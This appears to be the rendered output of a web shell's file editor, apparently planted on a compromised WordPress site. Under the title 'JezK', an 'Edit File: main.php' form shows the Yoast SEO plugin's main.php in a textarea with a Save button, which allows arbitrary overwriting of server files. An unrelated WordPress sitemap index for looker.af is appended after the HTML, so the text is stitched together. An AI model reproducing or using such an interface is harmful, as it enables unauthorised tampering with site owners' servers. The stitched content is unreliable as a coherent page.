
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: main.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php

namespace Yoast\WP\SEO;

use Yoast\WP\Lib\Abstract_Main;
use Yoast\WP\SEO\Dependency_Injection\Container_Compiler;
use Yoast\WP\SEO\Generated\Cached_Container;
use Yoast\WP\SEO\Surfaces\Classes_Surface;
use Yoast\WP\SEO\Surfaces\Helpers_Surface;
use Yoast\WP\SEO\Surfaces\Meta_Surface;

if ( ! \defined( &#039;WPSEO_VERSION&#039; ) ) {
	\header( &#039;Status: 403 Forbidden&#039; );
	\header( &#039;HTTP/1.1 403 Forbidden&#039; );
	exit();
}

/**
 * Class Main.
 *
 * @property Classes_Surface $classes      The classes surface.
 * @property Meta_Surface    $meta         The meta surface.
 * @property Helpers_Surface $helpers      The helpers surface.
 */
class Main extends Abstract_Main {

	/**
	 * The API namespace constant.
	 *
	 * @var string
	 */
	public const API_V1_NAMESPACE = &#039;yoast/v1&#039;;

	/**
	 * The WP CLI namespace constant.
	 *
	 * @var string
	 */
	public const WP_CLI_NAMESPACE = &#039;yoast&#039;;

	/**
	 * {@inheritDoc}
	 */
	protected function get_container() {
		if ( $this-&gt;is_development() &amp;&amp; \class_exists( &#039;\Yoast\WP\SEO\Dependency_Injection\Container_Compiler&#039; ) ) {
			// Exception here is unhandled as it will only occur in development.
			Container_Compiler::compile(
				$this-&gt;is_development(),
				__DIR__ . &#039;/generated/container.php&#039;,
				__DIR__ . &#039;/../config/dependency-injection/services.php&#039;,
				__DIR__ . &#039;/../vendor/composer/autoload_classmap.php&#039;,
				&#039;Yoast\WP\SEO\Generated&#039;
			);
		}

		if ( \file_exists( __DIR__ . &#039;/generated/container.php&#039; ) ) {
			require_once __DIR__ . &#039;/generated/container.php&#039;;

			return new Cached_Container();
		}

		return null;
	}

	/**
	 * {@inheritDoc}
	 */
	protected function get_name() {
		return &#039;yoast-seo&#039;;
	}

	/**
	 * {@inheritDoc}
	 */
	protected function get_surfaces() {
		return [
			&#039;classes&#039; =&gt; Classes_Surface::class,
			&#039;meta&#039;    =&gt; Meta_Surface::class,
			&#039;helpers&#039; =&gt; Helpers_Surface::class,
		];
	}
}
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
